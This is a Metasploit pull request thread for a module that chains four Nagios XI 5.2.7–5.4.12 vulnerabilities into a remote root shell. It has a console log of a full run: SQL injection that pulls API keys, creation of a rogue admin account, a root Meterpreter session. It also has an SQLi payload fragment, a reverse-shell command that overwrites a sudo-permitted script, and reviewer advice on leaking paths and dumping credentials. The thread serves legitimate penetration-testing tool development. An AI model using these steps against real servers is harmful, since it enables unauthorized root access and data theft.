Nagios XI Remote Root Exploit
rapid7/metasploit-framework pull request #9938
Opened 2018-04-26 22:07 UTC by BennyHusted

This module exploits 4 different vulnerabilities in Nagios XI version 5.2.7 - 5.4.12 to get a remote root shell. For more information, please see our [blog post](http://blog.redactedsec.net/exploits/2018/04/26/nagios.html)

[Sample OVA for Nagios 5.4.10](https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.4.10-64.ova)

### Nagios 5.2.7 on CentOS 6.7

```
msf > use exploit/linux/http/nagios_xi

msf exploit(nagios_xi) > set LHOST 15.0.0.181
LHOST => 15.0.0.181
msf exploit(nagios_xi) > set RHOST 10.20.1.194
RHOST => 10.20.1.194
msf exploit(nagios_xi) > exploit

[*] Started reverse TCP handler on 15.0.0.181:4444 
[*] STEP 0: Get Nagios XI version string.
[+] STEP 0: Found Nagios XI version: 5.3.0
[*] STEP 1: Setting Nagios XI DB user to root.
[*] STEP 1: Received a 302 Response. That's good!
[*] STEP 2: Exploiting SQLi to extract user API keys.
[*] STEP 2: Received a 302 Response. That's good!
[*] Found 1 unique api keys
[*] 67e52c8b387b0d17cb94b66788adaa40
[*] STEP 3: Using API Keys to add an administrative user...
[*] STEP 3: trying to add admin user with key 67e52c8b387b0d17cb94b66788adaa40
[+] Added user:aYJupLthTjZnwSQb password:heuOsZJMjwUYFpit userid:3
[*] STEP 4.1: Authenticate as user aYJupLthTjZnwSQb with password heuOsZJMjwUYFpit
[*] STEP 4.1: Get NSP and nagiosxi for login..
[*] STEP 4.1: login_nsp 1c52b832891f65d961e69d0db9a583f88c1dddcf637d37405c88d70a5371fe77 
[*] STEP 4.1: login_nagiosxi 5kk73vr4i3g6v1d5ekg2mtgd26
[*] STEP 4.2: Authenticating...
[*] STEP 4.2: authed_nagiosxi 5kk73vr4i3g6v1d5ekg2mtgd26
[*] STEP 5.1: executing payload
[*] STEP 5.2: removing scripts from disc
[*] Command Stager progress - 100.00% done (701/701 bytes)
[*] STEP 6.1: Setting Nagios XI DB user to nagiosql.
[*] STEP 6.1: Received a 302 Response. That's good!
[*] STEP 6.2: deleting admin
[*] Sending stage (847604 bytes) to 10.20.1.194
[*] Meterpreter session 1 opened (15.0.0.181:4444 -> 10.20.1.194:35750) at 2018-04-26 17:36:22 -0400
[*] Be sure to run post/linux/gather/enum_nagios_xi to exfil all the data off this box!

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > 

```

2018-04-26 22:26 UTC, bcoles commented on modules/exploits/linux/http/nagios_xi.rb
> +                'selInfoKey1'=>"c'UNION SELECT CONCAT('START_API:',#{sqli_parm},':END_API') FROM nagiosxi.xi_users-- ",
Can the `c` here be randomized, both in character and in length?

```ruby
rand_text_alpha(5..10)
```

2018-04-26 22:26 UTC, bcoles commented on modules/exploits/linux/http/nagios_xi.rb
> +                'name'=>'Firsty Lasterson',
Can this be randomized?

```ruby
rand_text_alpha(5..10)
```

2018-04-26 22:26 UTC, bcoles commented on modules/exploits/linux/http/nagios_xi.rb
> +    password = [*('a'..'z'),*('A'..'Z')].shuffle[0,16].join.to_s
Looks like you're generating a random string. You could use something like this:

```ruby
username = rand_text_alpha(5..10)
password = rand_text_alpha(5..10)
```

2018-04-26 22:26 UTC, bcoles commented on modules/post/linux/gather/enum_nagios_xi.rb
> +        buf = '' if buf =~ /No such file or directory/
`include?` is preferred.

```ruby
buf = '' if buf.include? 'No such file or directory'
```

2018-04-26 22:26 UTC, bcoles commented on modules/post/linux/gather/enum_nagios_xi.rb
> +      db_dump_file << [*('a'..'z'),*('A'..'Z')].shuffle[0,8].join.to_s
Looks like you're generating a random string. You could use something like this:

```ruby
db_dump_file  = "/tmp/#{rand_text_alpha(5..10)}"
```

2018-04-26 22:26 UTC, bcoles commented on modules/exploits/linux/http/nagios_xi.rb
> +      cmd_cleanup = "$(mv /usr/local/nagiosxi/scripts/reset_config_perms.sh.bak /usr/local/nagiosxi/scripts/reset_config_perms.sh)"
Are these paths like to change on different platforms? Is there any way to leak the path?

Also, it might be nice to use a unique randomized name for the backup file each run. That way, multiple exploitation attempts won't overwrite the backup in the event of a failed run.

2018-04-26 22:33 UTC, bcoles commented
Nice work on this. Chained exploits for the win.

There's a couple of problems with this PR from a procedure standpoint.

Firstly, it's generally preferred to keep one module per PR. This simplifies the review process and speeds up the process of merging, as the modules can be landed individually.

Secondly, allegedly, feature branches are a requirement. So sayeth r7:

> It is required that code in your fork be merged **from a unique branch** in your repository to master in Rapid7's.  Please create a new branch in your fork of framework and resubmit this from that branch.

  ```
  git checkout -b <BRANCH_NAME>
  git push <your_fork_remote> <BRANCH_NAME>
  ```

> This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.

2018-04-26 22:43 UTC, bcoles commented on modules/post/linux/gather/enum_nagios_xi.rb
> +    print_status(%Q|Run 'creds' to see credentials loaded into the MSF DB|)
This is a strange use of `%Q||` notation. Not really a big deal, but `"Run 'creds' to see credentials loaded into the MSF DB"` would be equally as effective.

2018-04-26 22:43 UTC, bcoles commented on modules/post/linux/gather/enum_nagios_xi.rb
> +      sql_query  =  %Q|mysql -u root -pnagiosxi -e "|
Is the password always `nagiosxi` ?

It might be nice to make this a configurable option, or leak the password if possible.

2018-04-26 22:43 UTC, bcoles commented on modules/post/linux/gather/enum_nagios_xi.rb
> +        'DefaultTarget'  => 0
Most of these options (`DefaultTarget`, `DefaultOptions`, `Targets`, etc) are likely redundant in the `Post` context.

2018-04-26 22:45 UTC, bcoles commented on documentation/modules/exploit/linux/http/nagios_xi.md
> +  See [our blog post](http://blog.redactedsec.net/exploits/2018/04/26/nagios.html) for more information
The module documentation is the perfect place to list the software installers which you linked in the PR:

[Sample OVA for Nagios 5.4.10](https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.4.10-64.ova)

2018-04-26 22:55 UTC, wvu-r7 commented
Can we name this something else? It seems pretty similar to https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/nagios_xi_chained_rce.rb. Maybe see what you can use from that exploit?

2018-04-26 22:58 UTC, bcoles commented on modules/exploits/linux/http/nagios_xi.rb
> +    def parse_printf(cmd)
This a strange design decision. Any particular reason? It would be nice to use other CmdStargers too, if possible.

2018-04-26 22:58 UTC, bcoles commented on modules/exploits/linux/http/nagios_xi.rb
> +class MetasploitModule < Msf::Exploit::Remote
Module should include the standard comment header, so users know where the module is from and how to use it.

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
```

2018-04-26 23:05 UTC, wvu requested changes
Can we name this something else? It seems pretty similar to https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/nagios_xi_chained_rce.rb. Maybe see what you can use from that exploit?

2018-04-27 16:46 UTC, BennyHusted commented on modules/exploits/linux/http/nagios_xi.rb
> +    def parse_printf(cmd)
Yes, it has to do with getting a root shell in conjunction with the command stager. The python POC for this same set of vulns executes this command 

```bash
$(cp /usr/local/nagiosxi/scripts/reset_config_perms.sh /usr/local/nagiosxi/scripts/reset_config_perms.sh.bak && echo  'bash -i >& /dev/tcp/{0}/{1} 0>&1'  > &/usr/local/nagiosxi/scripts/reset_config_perms.sh && sudo /usr/local/nagiosxi/scripts/reset_config_perms.sh && mv /usr/local/nagiosxi/scripts/reset_config_perms.sh.bak /usr/local/nagiosxi/scripts/reset_config_perms.sh)
```
As you can gather from the payload above, the user nagios has sudo nopasswd on reset_config_perms.sh, along with a few other scripts. This script is writable, so we should be able to back up the script, write our payload into, sudo that script, and then copy the old script back. 

The corresponding python poc for these vulns works very well, and gets a shell consistently, however when I use the command stager with the above script, it takes a bit of work to execute the command in one go, and it still doesn't execute the command to revert the backed up script. 

Ultimately after a trying a bunch of different changes, pulling out the printf statement from the payload (although the above code works with echo as well), and splitting it into two requests was what made the payload work. 

I still have an issue with the payload taking a variable amount of time to execute and call back, and the payload will continue to call back multiple times. I'll play around with this some more today or this weekend. Any advice on this would be greatly appreciated.

2018-04-27 21:39 UTC, BennyHusted commented on modules/exploits/linux/http/nagios_xi.rb
> +      cmd_cleanup = "$(mv /usr/local/nagiosxi/scripts/reset_config_perms.sh.bak /usr/local/nagiosxi/scripts/reset_config_perms.sh)"
The paths don't change per platform, AFAIK. I can make a change to randomize the backup file name.

2018-04-27 21:55 UTC, bcoles commented on modules/exploits/linux/http/nagios_xi.rb
> +      cmd_cleanup = "$(mv /usr/local/nagiosxi/scripts/reset_config_perms.sh.bak /usr/local/nagiosxi/scripts/reset_config_perms.sh)"
Regarding the paths, if the files are permitted via `sudo`, it might be possible to leak them with `sudo -l`. Perhaps more effort than it's worth.

Looks like the paths are the same in NagiosXI 5.4.4.

![sudo](https://user-images.githubusercontent.com/434827/39386742-5a5bda04-4ab9-11e8-8383-92f57504193e.png)

2018-05-01 17:20 UTC, closed without merging